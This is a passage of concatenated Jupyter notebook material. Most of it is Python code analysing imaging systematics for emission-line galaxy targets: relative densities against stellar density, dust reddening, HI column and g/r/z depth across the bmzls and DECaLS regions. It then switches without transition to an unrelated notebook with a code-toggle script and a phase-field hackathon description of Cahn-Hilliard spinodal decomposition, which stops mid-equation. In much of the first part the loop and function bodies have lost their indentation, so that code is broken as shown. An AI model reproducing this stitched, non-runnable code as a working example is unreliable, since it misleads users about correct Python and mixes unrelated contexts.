norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('Stellar Density')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC correction, points are after')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['EBV'],weights=1./effbm*ws,range=(0,0.15))
hgn1 = np.histogram(felg[dbml]['EBV'],bins=hg1[1])
hr1 = np.histogram(relg[rbml]['EBV'],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['EBV'],weights=1./effdn**2.*ws,range=(0,0.15))
hgn2 = np.histogram(felg[ddnl]['EBV'],bins=hg2[1])
hr2 = np.histogram(relg[rdnl]['EBV'],bins=hg2[1])
#DECaLS S
hg3 = np.histogram(felg[ddsl]['EBV'],weights=1./effds**2.,range=(0,0.15))
hgn3 = np.histogram(felg[ddsl]['EBV'],bins=hg3[1])
hr3 = np.histogram(relg[rdsl]['EBV'],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('E(B-V)')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
nh1 = fits.open('NHI_HPX.fits.gz')[1].data['NHI']
#make data column
thphi = radec2thphi(felg['RA'],felg['DEC'])
r = hp.Rotator(coord=['C','G'],deg=False)
thphiG = r(thphi[0],thphi[1])
pixhg = hp.ang2pix(1024,thphiG[0],thphiG[1])
h1g = np.zeros(len(felg))
for i in range(0,len(pixhg)):
h1g[i] = np.log(nh1[pixhg[i]])
if i%1000000==0 : print(i)
#make random column
thphi = radec2thphi(relg['RA'],relg['DEC'])
r = hp.Rotator(coord=['C','G'],deg=False)
thphiG = r(thphi[0],thphi[1])
pixhg = hp.ang2pix(1024,thphiG[0],thphiG[1])
h1r = np.zeros(len(relg))
for i in range(0,len(pixhg)):
h1r[i] = np.log(nh1[pixhg[i]])
if i%1000000==0 : print(i)
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(h1g[dbml],weights=1./effbm*ws)
hgn1 = np.histogram(h1g[dbml],bins=hg1[1])
hr1 = np.histogram(h1r[rbml],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(h1g[ddnl],weights=1./effdn**2.*ws)
hgn2 = np.histogram(h1g[ddnl],bins=hg2[1])
hr2 = np.histogram(h1r[rdnl],bins=hg2[1])
#DECaLS S
hg3 = np.histogram(h1g[ddsl],weights=1./effds**2.)
hgn3 = np.histogram(h1g[ddsl],bins=hg3[1])
hr3 = np.histogram(h1r[rdsl],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('ln(HI)')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
a = np.random.rand(len(relg))
w = a < 0.01
plt.plot(h1r[w],relg[w]['EBV'],'.k')
plt.show()
a,b = np.histogram(h1r,weights=relg['EBV'])
c,d = np.histogram(h1r,bins=b)
print(a)
print(c)
xlh = 0.5*(b[:-1]+b[1:]) #bin centers of these histograms, not the xl3 from the previous cell
plt.plot(0.008*np.exp(xlh-45.5),(a/c))
plt.plot(a/c,a/c,'--')
plt.show()
dhg = felg['EBV']-0.008*np.exp(h1g-45.5)
dhr = relg['EBV']-0.008*np.exp(h1r-45.5)
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(dhg[dbml],weights=1./effbm*ws,range=(-0.1,.15))
hgn1 = np.histogram(dhg[dbml],bins=hg1[1])
hr1 = np.histogram(dhr[rbml],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(dhg[ddnl],weights=1./effdn**2.*ws,range=(-0.1,.15))
hgn2 = np.histogram(dhg[ddnl],bins=hg2[1])
hr2 = np.histogram(dhr[rdnl],bins=hg2[1])
#DECaLS S
hg3 = np.histogram(dhg[ddsl],weights=1./effds**2.,range=(-0.1,.15))
hgn3 = np.histogram(dhg[ddsl],bins=hg3[1])
hr3 = np.histogram(dhr[rdsl],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('diff HI EBV')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
plt.scatter(relg[w]['RA'],relg[w]['DEC'],c=dhr[w],s=.1,vmax=0.04,vmin=-0.04)
plt.colorbar()
plt.show()
wr = abs(dhr) > 0.02
wg = abs(dhg) > 0.02
print(len(relg[wr])/len(relg))
print(len(felg[wg])/len(felg))
#bmzls
w1g = ~wg & dbml
w1r = ~wr & rbml
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[w1g]+b)
wsn = 1./(slp*stardensg[dbml]+b)
effbmw = effnorthl[w1g]
hg1 = np.histogram(felg[w1g]['EBV'],weights=1./effbmw*ws,range=(0,0.15))
hgn1 = np.histogram(felg[dbml]['EBV'],bins=hg1[1],weights=1./effbm*wsn)
hrn1 = np.histogram(relg[rbml]['EBV'],bins=hg1[1])
hr1 = np.histogram(relg[w1r]['EBV'],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
w1g = ~wg & ddnl
w1r = ~wr & rdnl
ws = 1./(slp*stardensg[w1g]+b)
wsn = 1./(slp*stardensg[ddnl]+b)
effdnw = effsouthl[w1g]
hg2 = np.histogram(felg[w1g]['EBV'],weights=1./effdnw**2.*ws,range=(0,0.15))
hgn2 = np.histogram(felg[ddnl]['EBV'],bins=hg2[1],weights=1./effdn**2.*wsn)
hrn2 = np.histogram(relg[rdnl]['EBV'],bins=hg2[1])
hr2 = np.histogram(relg[w1r]['EBV'],bins=hg2[1])
#DECaLS S
w1g = ~wg & ddsl
w1r = ~wr & rdsl
effdsw = effsouthl[w1g]
hg3 = np.histogram(felg[w1g]['EBV'],weights=1./effdsw**2.,range=(0,0.15))
hgn3 = np.histogram(felg[ddsl]['EBV'],bins=hg3[1],weights=1./effds**2.)
hrn3 = np.histogram(relg[rdsl]['EBV'],bins=hg3[1])
hr3 = np.histogram(relg[w1r]['EBV'],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
norm1n = sum(hgn1[0])/sum(hrn1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hrn1[0]/norm1n,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
norm2n = sum(hgn2[0])/sum(hrn2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hrn2[0]/norm2n,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
norm3n = sum(hgn3[0])/sum(hrn3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hrn3[0]/norm3n,'b:')
plt.ylim(.7,1.3)
plt.xlabel('E(B-V)')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title(r'dashed is before masking |$\Delta$|E(B-V)$>0.02$, points are after')
plt.show()
def plotvsstar(d1,r1,reg='',fmt='ko'):
w1 = d1
#w1 &= felg['MORPHTYPE'] == mp
#w1 &= d1['EBV'] < 0.15 #mask applied to (e)BOSS
#mr = r1['EBV'] < 0.15
hd1 = np.histogram(stardensg[w1],range=(0,5000))
#print(hd1)
hr1 = np.histogram(stardensr[r1],bins=hd1[1])
#print(hr1)
xl = []
for i in range(0,len(hd1[0])):
xl.append((hd1[1][i]+hd1[1][i+1])/2.)
plt.errorbar(xl,hd1[0]/hr1[0],np.sqrt(hd1[0])/hr1[0],fmt=fmt)
#plt.title(str(mp)+reg)
#plt.ylabel('relative density')
#plt.xlabel('stellar density')
#plt.show()
morphl = np.unique(felg['MORPHTYPE'])
print(morphl)
for mp in morphl:
msel = felg['MORPHTYPE'] == mp
tsel = ddsl & msel
tseln = ddnl & msel
print(mp)
print(len(felg[tsel])/len(felg[ddsl]),len(felg[tseln])/len(felg[ddnl]))
plotvsstar(tsel,rdsl,'DECaLS South')
plotvsstar(tseln,rdnl,'DECaLS North',fmt='rd')
# plt.title(str(mp)+reg)
plt.ylabel('relative density')
plt.xlabel('stellar density')
plt.legend(['DECaLS SGC','DECaLS NGC'])
plt.title('selecting type '+mp)
plt.show()
'''
Divide DECaLS S into DES and non-DES
'''
import pymangle
desply ='/global/cscratch1/sd/raichoor/desits/des.ply'
mng = pymangle.mangle.Mangle(desply)
polyidd = mng.polyid(felg['RA'],felg['DEC'])
isdesd = polyidd != -1
polyidr = mng.polyid(relg['RA'],relg['DEC'])
isdesr = polyidr != -1
ddsdl = ddsl & isdesd
ddsndl = ddsl & ~isdesd
rdsdl = rdsl & isdesr
rdsndl = rdsl & ~isdesr
#DECaLS SGC DES
hg1 = np.histogram(stardensg[ddsdl],weights=1./effsouthl[ddsdl]**2.,range=(0,5000))
#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))
hgn1 = np.histogram(stardensg[ddsdl],bins=hg1[1])
hr1 = np.histogram(stardensr[rdsdl],bins=hg1[1])
#DECaLS SGC not DES
hg2 = np.histogram(stardensg[ddsndl],weights=1./effsouthl[ddsndl]**2.,range=(0,5000))
#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))
hgn2 = np.histogram(stardensg[ddsndl],bins=hg2[1])
hr2 = np.histogram(stardensr[rdsndl],bins=hg2[1])
xl1 = []
xl2 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
plt.ylim(.7,1.3)
plt.xlabel('Stellar Density')
plt.ylabel('relative density')
plt.legend((['DES','SGC, not DES']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
#plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
'''
g-band depth
'''
#DECaLS SGC DES
hg1 = np.histogram(felg[ddsdl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,2000))
#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))
hgn1 = np.histogram(felg[ddsdl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsdl]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rdsdl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsdl]['EBV']),bins=hg1[1])
#DECaLS SGC not DES
hg2 = np.histogram(felg[ddsndl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,2000))
#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))
hgn2 = np.histogram(felg[ddsndl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsndl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdsndl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsndl]['EBV']),bins=hg2[1])
xl1 = []
xl2 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_G*MWTRANS')
plt.ylabel('relative density')
plt.legend((['DES','SGC, not DES']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
#plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
'''
r-band depth
'''
#DECaLS SGC DES
hg1 = np.histogram(felg[ddsdl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,2000))
#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))
hgn1 = np.histogram(felg[ddsdl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsdl]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rdsdl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsdl]['EBV']),bins=hg1[1])
#DECaLS SGC not DES
hg2 = np.histogram(felg[ddsndl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,2000))
#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))
hgn2 = np.histogram(felg[ddsndl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsndl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdsndl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsndl]['EBV']),bins=hg2[1])
xl1 = []
xl2 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_R*MWTRANS')
plt.ylabel('relative density')
plt.legend((['DES','SGC, not DES']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
#plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
'''
z-band depth
'''
#DECaLS SGC DES
hg1 = np.histogram(felg[ddsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,500))
#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))
hgn1 = np.histogram(felg[ddsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsdl]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rdsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsdl]['EBV']),bins=hg1[1])
#DECaLS SGC not DES
hg2 = np.histogram(felg[ddsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,500))
#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))
hgn2 = np.histogram(felg[ddsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsndl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsndl]['EBV']),bins=hg2[1])
xl1 = []
xl2 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_Z*MWTRANS')
plt.ylabel('relative density')
plt.legend((['DES','SGC, not DES']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
#plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
'''
Above results didn't quite work at low depth; checking what happens when snr requirements are ignored in the MC
Results are gone, but they basically show that removing the snr requirements makes things worse
'''
grids = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffnosnrgridsouth.dat').transpose()
#grids[3] = grids[3]
gridn = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffnosnrgridnorth.dat').transpose()
effsouthlno = interpeff(gsig,rsig,zsig,south=True)
effnorthlno = interpeff(gsig,rsig,zsig,south=False)
effbmno = effnorthlno[dbml]
print(np.mean(effbmno))
effbmno = effbmno/np.mean(effbmno)
plt.hist(effbmno,bins=100)
plt.show()
effdnno = effsouthlno[ddnl]
print(np.mean(effdnno))
effdnno = effdnno/np.mean(effdnno)
plt.hist(effdnno,bins=100)
plt.show()
#plt.scatter(felg[dbml]['RA'],felg[dbml]['DEC'],c=effbm)
#plt.colorbar()
#plt.show()
effdsno = effsouthlno[ddsl]
print(np.mean(effdsno))
effdsno = effdsno/np.mean(effdsno)
plt.hist(effdsno,bins=100)
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),weights=1./effbmno*ws,range=(0,200))
hgn1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),weights=1./effdnno**2.*ws,range=(0,200))
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
#use the z-band extinction coefficient R_Z for GALDEPTH_Z (R_R appears to be a typo)
hg3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),weights=1./effdsno**2.,range=(0,200))
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),bins=hg3[1])
hr3 = np.histogram(relg[rdsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
    xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
    xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
    xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_Z*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),weights=1./effbmno*ws,range=(0,2000))
hr1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])
#no correction
hgn1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),bins=hg1[1])
hrn1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),weights=1./effdnno**2.*ws,range=(0,3000))
hr2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),bins=hg2[1])
hrn2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
#no strong relation with stellar density
hg3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),weights=1./effdsno**2.,range=(0,2000))
hr3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),bins=hg3[1])
hrn3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
    xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
    xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
    xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hrn1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hrn2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hrn3[0]/norm3,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_G*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.show()
```
|
github_jupyter
|
```
from IPython.display import HTML
HTML('''<script>
code_show=true;
function code_toggle() {
if (code_show){
$('div.input').hide();
$('div.prompt').hide();
} else {
$('div.input').show();
$('div.prompt').show();
}
code_show = !code_show
}
$( document ).ready(code_toggle);
</script>
<form action="javascript:code_toggle()"><input type="submit" value="Code Toggle"></form>''')
```
# Table of Contents
* [Challenge Problems](#Challenge-Problems)
* [1. Spinodal Decomposition - Cahn-Hilliard](#1.-Spinodal-Decomposition---Cahn-Hilliard)
* [Parameter Values](#Parameter-Values)
* [Initial Conditions](#Initial-Conditions)
* [Domains](#Domains)
* [a. Square Periodic](#a.-Square-Periodic)
* [b. No Flux](#b.-No-Flux)
* [c. T-Shape No Flux](#c.-T-Shape-No-Flux)
* [d. Sphere](#d.-Sphere)
* [Tasks](#Tasks)
* [2. Ostwald Ripening -- coupled Cahn-Hilliard and Allen-Cahn equations](#2.-Ostwald-Ripening----coupled-Cahn-Hilliard-and-Allen-Cahn-equations)
* [Parameter Values](#Parameter-Values)
* [Initial Conditions](#Initial-Conditions)
* [Domains](#Domains)
* [a. Square Periodic](#a.-Square-Periodic)
* [b. No Flux](#b.-No-Flux)
* [c. T-Shape No Flux](#c.-T-Shape-No-Flux)
* [d. Sphere](#d.-Sphere)
* [Tasks](#Tasks)
# Challenge Problems
For the first hackathon there are two challenge problems, a spinodal decomposition problem and an Ostwald ripening problem. The only solutions included here currently are with FiPy.
## 1. Spinodal Decomposition - Cahn-Hilliard
The free energy density is given by,
$$ f = f_0 \left[ c \left( \vec{r} \right) \right] + \frac{\kappa}{2} \left| \nabla c \left( \vec{r} \right) \right|^2 $$
where $f_0$ is the bulk free energy density given by,
$$ f_0\left[ c \left( \vec{r} \right) \right] =
- \frac{A}{2} \left(c - c_m\right)^2
+ \frac{B}{4} \left(c - c_m\right)^4
+ \frac{c_{\alpha}}{4} \left(c - c_{\alpha} \right)^4
+ \frac{c_{\beta}}{4} \left(c - c_{\beta} \right)^4 $$
where $c_m = \frac{1}{2} \left( c_{\alpha} + c_{\beta} \right)$ and $c_{\alpha}$ and $c_{\beta}$ are the concentrations at which the bulk free energy density has minima (corresponding to the solubilities in the matrix phase and the second phase, respectively).
The time evolution of the concentration field, $c$, is given by the Cahn-Hilliard equation:
$$ \frac{\partial c}{\partial t} = \nabla \cdot \left[
